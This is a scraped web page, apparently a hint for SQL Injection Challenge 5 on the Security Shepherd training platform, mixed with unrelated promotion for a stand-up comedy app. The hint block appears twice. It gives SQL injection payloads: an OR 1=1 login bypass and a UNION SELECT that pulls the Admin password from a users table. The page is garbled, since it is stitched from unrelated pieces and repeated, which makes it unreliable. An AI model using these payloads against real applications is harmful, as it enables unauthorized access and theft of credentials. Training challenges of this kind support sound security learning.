Sql | Injection Challenge 5 Security Shepherd

One platform for all things stand-up — comedians, comedy specials, comedy albums, live shows, podcasts and more!

Download on the App Store
Preview Jester Database

: The application likely uses a query similar to: SELECT * FROM coupons WHERE couponCode = "[YOUR_INPUT]" AND status = 'active'

If the simple bypass doesn't work, the application might be checking for a specific number of columns or a specific user ID. Try: ' OR 1=1 LIMIT 1 --

' UNION SELECT 1, password, 3 FROM users WHERE username='Admin'--

Sql | Injection Challenge 5 Security Shepherd

: The application likely uses a query similar to: SELECT * FROM coupons WHERE couponCode = "[YOUR_INPUT]" AND status = 'active'

If the simple bypass doesn't work, the application might be checking for a specific number of columns or a specific user ID. Try: ' OR 1=1 LIMIT 1 --

' UNION SELECT 1, password, 3 FROM users WHERE username='Admin'--